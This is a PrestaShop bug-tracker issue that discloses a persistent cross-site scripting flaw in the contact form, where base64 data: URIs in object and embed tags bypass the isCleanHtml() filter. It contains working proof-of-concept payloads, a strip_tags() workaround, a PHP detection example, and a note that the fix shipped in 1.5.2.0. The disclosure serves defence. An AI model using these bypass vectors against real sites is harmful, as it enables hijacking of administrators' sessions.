Details

    • Type: Bug
    • Status: Closed
    • Resolution: Fixed
    • Affects Version/s: None
    • Fix Version/s: None
    • Labels:
      None
    • Environment:
      Affected browsers: Mozilla Firefox, Google Chrome and Apple Safari latest versions.

      Description

      Hello,
      When installing and analyzing PrestaShop in a secure environment I discovered that it's possible to bypass the isCleanHtml() function, which is used in many places, especially in the Contact Form.
      A user could use this vulnerability, a Persistent Cross-site Scripting, to execute malicious payloads in the admin's message box.

      Proof of concept:
      In the message field a user could write:
      <object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgid2Vic2VndXJhLm5ldC14c3MiKTwvc2NyaXB0Pg=='></object>

      or

      <embed src='data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIndlYnNlZ3VyYS5uZXQgeHNzIik7PC9zY3JpcHQ+PC9zdmc+' type='image/svg+xml' AllowScriptAccess='always'></embed>

      Both Base64 strings are essentially <script>alert()</script> encoded.

      Those XSS vectors bypass the filter in isCleanHtml() and execute automatically when the admin checks the messages in the admin area. This is critical and could be used a lot, causing bad scenarios.

      Keep in mind that in some webmail clients the code is also executed. A user can even use <h1> headings and other HTML in the message box.
      I think that in this particular case HTML should be stripped out, because in my opinion it has no purpose on the contact form. Of course, another solution is to sanitize user input by improving the isCleanHtml() function.

      Hope this information helps you guys to keep PrestaShop more secure.
      By the way, nice job on PrestaShop. It's an easy and reliable CMS to install and maintain. Keep it up.

      Best regards,
      David Sopas
      @dsopas

        Activity

        Andri Herumurti added a comment -

        Hi,

        Thanks for the information.
        May I know a workaround to secure our shop when we use 1.5.1?

        David Sopas added a comment -

        Hi,
        You can strip all tags on message variable.

        In file /controllers/front/ContactController.php after the line:
        $message = Tools::getValue('message'); // Html entities is not usefull, iscleanHtml check there is no bad html tags.

        Add:
        $message = strip_tags($message);

        This could be a temporary fix until PrestaShop developers fix this issue.

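The following is an added example, not PrestaShop's own code. It shows why a tag blocklist misses the <object>/<embed> vectors from the report (the script only appears after the base64 data: URI is decoded), adds a defensive check that surfaces such payloads, and applies the strip_tags() workaround from the comment above. The naiveBlocklistIsClean() function is an assumed stand-in; the real isCleanHtml() internals are not shown on this page.

```php
<?php
// Added example, not PrestaShop's own code. Shows why a tag blocklist misses
// the reported vectors (the script sits inside a base64 data: URI of an
// <object>/<embed>, so no <script> tag appears in the raw input) and pairs a
// defensive data: URI check with the strip_tags() workaround from the thread.

// Constructed sample message shaped like the first proof of concept.
$inner   = '<script>alert(1)</script>';
$message = "Hello <h1>support</h1>\n"
         . "<object data='data:text/html;base64," . base64_encode($inner) . "'></object>";

// Assumption: a stand-in for a naive blocklist filter; the real isCleanHtml()
// internals are not shown on this page. It only looks for dangerous tag names.
function naiveBlocklistIsClean(string $html): bool
{
    return !preg_match('#<\s*(script|iframe|applet)\b#i', $html);
}

// Defensive check: find <object>/<embed> elements whose data/src attribute is a
// data: URI and decode the body to reveal what would actually be rendered.
function findDataUriEmbeds(string $html): array
{
    $re = '#<\s*(object|embed)\b[^>]*?\b(data|src)\s*=\s*([\'"])\s*data:'
        . '([^;,\'"]*)(;base64)?,([^\'"]*)\3#i';
    $found = [];
    if (preg_match_all($re, $html, $matches, PREG_SET_ORDER)) {
        foreach ($matches as $m) {
            // Group 5 is ";base64" when present; otherwise the body is percent-encoded.
            $body = $m[5] !== '' ? (string) base64_decode($m[6], true) : rawurldecode($m[6]);
            $found[] = ['tag' => strtolower($m[1]), 'mime' => $m[4], 'decoded' => $body];
        }
    }
    return $found;
}

// The blocklist finds no dangerous tag name in the raw message.
var_dump(naiveBlocklistIsClean($message));

// The data: URI check exposes the script hidden in the <object> payload.
foreach (findDataUriEmbeds($message) as $hit) {
    printf("%s with %s payload decodes to: %s\n", $hit['tag'], $hit['mime'], $hit['decoded']);
}

// Workaround from the thread: drop every tag before the message is stored.
echo strip_tags($message), "\n";
```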
        Andri Herumurti added a comment -

        Hi David,

        Thanks,

        May I know the side effect of adding this line below to avoid XSS?
        $message = strip_tags($message);

        David Sopas added a comment -

        It only disables all tags in the message box of the Contact form.
        As I said before, it's a temporary fix until the PrestaShop developers check this security bug.

        Andri Herumurti added a comment -

        Hi David,

        Is it just the contact form, or is there another file that we should edit?
        Maybe you found another security issue?

        David Sopas added a comment -

        So far, only that file.

        Andri Herumurti added a comment -

        Thank you very much for your information...

        Rémi GAILLARD added a comment -

        Hi Everyone,

        This issue is fixed on our 1.5.2.0 version which was released yesterday.
        You can upgrade your store to this version in order to secure your store.

        Best Regards,

        Fabien VINCENT added a comment -

        Is there any option to view changes in SVN, like ViewVC or another tool? scm.prestashop.com seems inaccessible, and I want to check if other versions I have installed for customers are vulnerable to this (1.2.x, 1.4.x and 1.5.x). Is only 1.5.x affected by this security problem?


          People

          • Assignee: Rémi GAILLARD
          • Reporter: David Sopas
          • Votes: 0
          • Watchers: 0
